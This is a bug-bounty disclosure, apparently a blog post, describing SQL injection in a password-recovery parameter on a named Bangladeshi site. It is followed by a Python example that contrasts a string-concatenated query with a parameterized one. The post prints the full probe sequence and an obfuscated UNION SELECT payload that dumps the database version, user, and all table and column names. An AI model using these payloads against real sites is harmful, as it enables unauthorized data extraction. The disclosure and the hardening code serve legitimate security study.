Bug Bounty at a Bangladeshi Site

Shaifullah Shaon
Jul 15, 2018 · 2 min read

Hello,

I am Shaifullah Shaon (Black_EyE), Admin (CEO) at Cyber Terminator Army.

I found multiple vulnerabilities to disclose.

1st : http://rediact.com/(Another Dir)/admin

I had already been in that panel and had already reported that issue. For that issue I had already received 10K BDT.

Recently, after 8 months, I tried to find another bug on that site.

I tried that URL again. This time the URL showed me 404 Not Found.

http://rediact.com/(Another Dir)/admin => 404 Not Found!!!

Then I tried again with /admin removed.

What did I see there? The site was OK. I tried "/login" in place of "/admin", and now I saw 403 Forbidden on that site. I thought to myself: something is there. I went back to the site again. URI = http://rediact.com/(Another Dir)/

I created a new account. After creating the account I did not verify it with a mobile number. Then I tried to recover my password.

What I saw!!!

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)&uname=(username)

Next I tried SQL injection there.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)'&uname=(username) => Error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)' -- -&uname=(username) => Error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) -- -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 10 -- -&uname=(username) => error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 2 -- -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 3 -- -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 4 -- -&uname=(username) => error

Found the column count of the vulnerable query.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,3 -- -&uname=(username) => 200 ok

N.B.: I generally write union select in mixed case.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,vulnerable -- -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,COncAt(version(),0x3c2f7469746c653e,0x3c666f6e7420636f6c6f723d7265643e,0x3c68313e496e6a656374656420427920436c6f7564792056697275733c2f68313e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x55534552203d,user(),0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,0x56455253494f4e203d,version(),0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,0x4441544142415345203d20,database(),0x3c62723e,0x3c666f6e7420636f6c6f723d6d6167656e74613e,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat
(@,0x3c62723e ,TaBLe_nAMe,0x203a3a20,column_name))))a)) — -&uname=(username) => 200 ok

I reported the issue on = 10th January, 2018

Reply date and time = 10th January, 2018

Bounty date and time = 18th February, 2018
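
The probes in this write-up get a response from the database only when the id value is spliced into the SQL text. The following is an added example, not code from the original post or from the site: it assumes a handler shape and uses Python's sqlite3 with constructed sample data to run the same probes against a concatenated query and against a validated, parameterized one.

```python
import sqlite3

# Probe strings taken from the write-up, with "1" as a constructed user id.
PAGE_PROBES = ["1'", "1 order by 3 -- -", "1 order by 4 -- -",
               "1 and false uNioN SeLecT 1,2,3 -- -"]

def make_db():
    # Constructed sample rows standing in for the site's user table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, uname TEXT, phone TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "01700000001"), (2, "bob", "01700000002")])
    return db

def recover_vulnerable(db, id_param, uname):
    # Assumed shape of the flawed handler: id is pasted into the SQL text,
    # so everything after the number is parsed as SQL. uname is never checked.
    sql = "SELECT id, uname, phone FROM users WHERE id = " + id_param
    return db.execute(sql).fetchall()

def recover_hardened(db, id_param, uname):
    # 1. id must be a plain ASCII decimal integer; reject everything else.
    if not (id_param.isascii() and id_param.isdigit()):
        raise ValueError("id must be numeric")
    # 2. Bind both values as parameters so they are data, never SQL.
    # 3. Require id and uname to identify the same row.
    sql = "SELECT id, uname, phone FROM users WHERE id = ? AND uname = ?"
    return db.execute(sql, (int(id_param), uname)).fetchall()

def outcome(handler, id_param, uname="alice"):
    # Classify what a request does: rows returned, a database error
    # (the database parsed request text as SQL), or rejection before the query.
    db = make_db()
    try:
        return handler(db, id_param, uname)
    except sqlite3.Error:
        return "sql-error"
    except ValueError:
        return "rejected"

if __name__ == "__main__":
    for probe in PAGE_PROBES:
        print(repr(probe), "| vulnerable:", outcome(recover_vulnerable, probe),
              "| hardened:", outcome(recover_hardened, probe))
```

The error/200 pattern from the concatenated handler mirrors the responses listed in the post; the hardened handler returns the same rejection for every probe, so the response no longer reveals the query's column count.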
